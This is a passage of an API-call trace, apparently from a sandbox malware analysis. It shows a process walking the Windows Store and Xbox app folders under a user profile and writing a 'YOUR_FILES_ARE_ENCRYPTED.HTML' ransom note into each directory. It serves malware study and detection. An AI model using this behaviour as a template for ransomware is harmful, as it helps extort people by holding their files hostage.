param_1=0x19e0ea, param_2="%02X" | out: param_1="82") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="A4") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="70") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="86") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="75") returned 2 [0120.767] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="09") returned 2 [0120.767] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="6C") returned 2 [0120.767] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="F7") returned 2 [0120.767] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="E7") returned 2 [0120.767] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="A4") returned 2 [0120.767] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="68") returned 2 [0120.767] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="9E") returned 2 [0120.767] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="3F") returned 2 [0120.767] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="88") returned 2 [0120.767] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="6F") returned 2 [0120.767] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="57") returned 2 [0120.768] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat" [0120.768] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.768] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0120.768] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x937de8b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x937de8b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0120.768] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.768] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0120.768] GetProcessHeap () returned 0x600000 [0120.768] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.768] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.769] WriteFile (in: hFile=0x324, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.770] CloseHandle (hObject=0x324) returned 1 [0120.770] GetProcessHeap () returned 0x600000 [0120.770] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.770] GetProcessHeap () returned 0x600000 [0120.770] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.770] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x937de8b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x937de8b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x937de8b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0120.770] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.770] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData") returned 99 [0120.770] GetProcessHeap () returned 0x600000 [0120.770] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.771] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData" [0120.771] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData\\*" [0120.771] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x937de8b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x937de8b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x937de8b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0120.771] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x937de8b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x937de8b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x937de8b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="..", cAlternateFileName="")) returned 1 [0120.771] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x937de8b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x937de8b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x937de8b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="..", cAlternateFileName="")) returned 0 [0120.771] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0120.771] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0120.771] GetProcessHeap () returned 0x600000 [0120.771] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.772] WriteFile (in: hFile=0x324, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.773] CloseHandle (hObject=0x324) returned 1 [0120.773] GetProcessHeap () returned 0x600000 [0120.773] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.773] GetProcessHeap () returned 0x600000 [0120.773] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.773] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9357b12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9357b12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0120.773] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.773] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState") returned 95 [0120.773] GetProcessHeap () returned 0x600000 [0120.773] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.773] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState" [0120.773] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState\\*" [0120.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9357b12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9357b12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.773] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9357b12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9357b12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="..", cAlternateFileName="")) returned 1 [0120.773] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9357b12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9357b12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="..", cAlternateFileName="")) returned 0 [0120.773] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.773] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0120.773] GetProcessHeap () returned 0x600000 [0120.773] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.774] WriteFile (in: hFile=0x324, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.775] CloseHandle (hObject=0x324) returned 1 [0120.775] GetProcessHeap () returned 0x600000 [0120.775] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.775] GetProcessHeap () returned 0x600000 [0120.775] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.775] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9357b12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9357b12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0120.775] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0120.775] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0120.775] GetProcessHeap () returned 0x600000 [0120.775] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0120.776] WriteFile (in: hFile=0x214, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0120.777] CloseHandle (hObject=0x214) returned 1 [0120.777] GetProcessHeap () returned 0x600000 [0120.777] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.777] GetProcessHeap () returned 0x600000 [0120.777] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0120.778] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60d4016, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.XboxApp_8wekyb3d8bbwe", cAlternateFileName="MICROS~3.XBO")) returned 1 [0120.778] StrStrIW (lpFirst="Microsoft.XboxApp_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.778] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe") returned 80 [0120.778] GetProcessHeap () returned 0x600000 [0120.778] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0120.779] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe" [0120.779] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\*" [0120.779] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60d4016, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6598ae0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6598ae0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0120.779] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60d4016, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6598ae0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6598ae0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0120.779] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0120.780] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.780] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC") returned 83 [0120.780] GetProcessHeap () returned 0x600000 [0120.780] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.780] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC" [0120.780] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\*" [0120.780] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.795] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="..", cAlternateFileName="")) returned 1 [0120.795] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0120.795] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.795] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache") returned 93 [0120.795] GetProcessHeap () returned 0x600000 [0120.795] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.796] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache" [0120.796] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache\\*" [0120.796] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, 